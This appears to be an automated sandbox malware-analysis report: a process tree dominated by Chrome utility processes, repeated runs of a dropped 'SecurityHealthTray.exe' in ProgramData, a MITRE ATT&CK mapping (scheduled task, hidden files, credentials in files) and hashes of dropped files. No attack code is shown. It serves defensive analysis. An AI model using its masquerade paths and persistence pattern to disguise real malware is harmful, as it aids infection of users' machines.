"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:8
2⤵
PID:4608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 /prefetch:8
2⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3728 /prefetch:8
2⤵
PID:4924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:8
2⤵
PID:4968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4108 /prefetch:8
2⤵
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5068 /prefetch:8
2⤵
PID:5048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:8
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4676 /prefetch:8
2⤵
PID:96

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4568 /prefetch:8
2⤵
PID:4180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:8
2⤵
PID:4112

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
2⤵
PID:4892

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff78ac27740,0x7ff78ac27750,0x7ff78ac27760
3⤵
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:8
2⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1800 /prefetch:8
2⤵
PID:1848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:8
2⤵
PID:3788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:8
2⤵
PID:2424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5976 /prefetch:8
2⤵
PID:588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:8
2⤵
PID:4712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:8
2⤵
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:8
2⤵
PID:1676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6300 /prefetch:8
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6404 /prefetch:8
2⤵
PID:3888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6536 /prefetch:8
2⤵
PID:4908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6680 /prefetch:8
2⤵
PID:4448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:8
2⤵
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:8
2⤵
PID:2632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
2⤵
PID:3716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7064 /prefetch:8
2⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7212 /prefetch:8
2⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7356 /prefetch:8
2⤵
PID:3708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7484 /prefetch:8
2⤵
PID:4768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7488 /prefetch:8
2⤵
PID:3172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:8
2⤵
PID:188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7620 /prefetch:8
2⤵
PID:740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
2⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8252 /prefetch:8
2⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8248 /prefetch:8
2⤵
PID:1524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8528 /prefetch:8
2⤵
PID:3996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8664 /prefetch:8
2⤵
PID:4224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8792 /prefetch:1
2⤵
PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3732 /prefetch:8
2⤵
PID:4208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
2⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8992 /prefetch:8
2⤵
PID:416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 /prefetch:8
2⤵
PID:4720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8
2⤵
PID:4184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8928 /prefetch:8
2⤵
PID:4600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7972 /prefetch:8
2⤵
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
2⤵
PID:4964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,5878472201893442666,3264550509037093599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8816 /prefetch:8
2⤵
PID:3888

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7fff7b806e00,0x7fff7b806e10,0x7fff7b806e20
2⤵
PID:2112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1424,4449305471746831207,1207310805998617818,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1432 /prefetch:2
2⤵
PID:3740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1424,4449305471746831207,1207310805998617818,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1832 /prefetch:8
2⤵
PID:156

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:5068

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:4188

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:1040

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:4956

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:1176

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
PID:420

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\ShellExperienceHost.exe
MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
MD5
d73da52b837a87161f3d7ad70ea718d1

SHA1
6fa8ddc8cfbeaa5a917bd1867897bc2909d11c12

SHA256
edb63a06e6ca36650e96533c1674410e0f2799b14526f4c7049d47133423917b

SHA512
2fb074828e17cc6047fd123eac68851e0c4ea50dc1df25cfb527bae436659c6c2ab8a6b47f7376a9ecc6323fa218aeec374ab5f9bf2934d723cc56633a1f04e0

Download Submit
C:\ProgramData\SecurityEssentials\task.xml
MD5
941e541b9eae61e8fea324eceae33077

SHA1
e66623f0f947cb6bf7a45f6f27b4f455101a4bdf

SHA256
faa950bbc214e278d197a385fa638c27b3e5c58928bb529f0310159125b8c501

SHA512
23c4bba1a67bf11602d382e64faa968e0d5eba0d165655cd2c6452c55bd6f3468e7214731ef89050882bb08538e495439dba53777cce0648e8d8fc96de783ccb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
bbe33ae555b2e6ca80711c4fb4ab91e7

SHA1
69a917b35f5d7d4d1cc6b13fa9c64e247a0c080c

SHA256
d77856db4fdcc56299f73843014a18183dbc8f3952478362c1ed6d95672fe594

SHA512
3b5e8c3981e0fd3f5f7dbdd05343b9e499e21ef22b817ac4a7036d4a2b448ada8aae90d88ea1f22432f84e384d2b44b2d6c26d906becee60993ddb49ae99d2fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
bbe33ae555b2e6ca80711c4fb4ab91e7

SHA1
69a917b35f5d7d4d1cc6b13fa9c64e247a0c080c

SHA256
d77856db4fdcc56299f73843014a18183dbc8f3952478362c1ed6d95672fe594

SHA512
3b5e8c3981e0fd3f5f7dbdd05343b9e499e21ef22b817ac4a7036d4a2b448ada8aae90d88ea1f22432f84e384d2b44b2d6c26d906becee60993ddb49ae99d2fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
bbe33ae555b2e6ca80711c4fb4ab91e7

SHA1
69a917b35f5d7d4d1cc6b13fa9c64e247a0c080c

SHA256
d77856db4fdcc56299f73843014a18183dbc8f3952478362c1ed6d95672fe594

SHA512
3b5e8c3981e0fd3f5f7dbdd05343b9e499e21ef22b817ac4a7036d4a2b448ada8aae90d88ea1f22432f84e384d2b44b2d6c26d906becee60993ddb49ae99d2fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
bbe33ae555b2e6ca80711c4fb4ab91e7

SHA1
69a917b35f5d7d4d1cc6b13fa9c64e247a0c080c

SHA256
d77856db4fdcc56299f73843014a18183dbc8f3952478362c1ed6d95672fe594

SHA512
3b5e8c3981e0fd3f5f7dbdd05343b9e499e21ef22b817ac4a7036d4a2b448ada8aae90d88ea1f22432f84e384d2b44b2d6c26d906becee60993ddb49ae99d2fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
bbe33ae555b2e6ca80711c4fb4ab91e7

SHA1
69a917b35f5d7d4d1cc6b13fa9c64e247a0c080c

SHA256
d77856db4fdcc56299f73843014a18183dbc8f3952478362c1ed6d95672fe594

SHA512
3b5e8c3981e0fd3f5f7dbdd05343b9e499e21ef22b817ac4a7036d4a2b448ada8aae90d88ea1f22432f84e384d2b44b2d6c26d906becee60993ddb49ae99d2fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
MD5
ecc3d9981116a82180bc0fd416f99ff2

SHA1
67e91aae8c922fd349dd2d33fef639137ed43e1b

SHA256
8829012665c2e3dca5f5e85375e6a13c6994dc8a21420d6a68bf9b465248bfbf

SHA512
bf1ab131f42c1a778df5d54e62a345ead490f639ff0331c6b474646049f49189b0ea988f9410d77c33f0528d5d82bcb4e3190ae280989029a49d44fae7496107

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
MD5
a83b104b9e82c6dac9ed2c35dc8ff1b0

SHA1
ee9d7d9a80fbcc36ab539041a42057d0aadf5139

SHA256
ae094523cfd3c8602bac4423c333782b5f286f470c827b8850ff0708c9087b54

SHA512
0907e014c983109aa9742478654a9dc21ab3822de3aa45ead1e2459a1a225457ddc5e6cd97825cb2761f479e5e936dc18eba377aa41e7071ab5a8db0288606d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe
MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe
MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
d287d60aaf019246a1a8c5db68b8f41a

SHA1
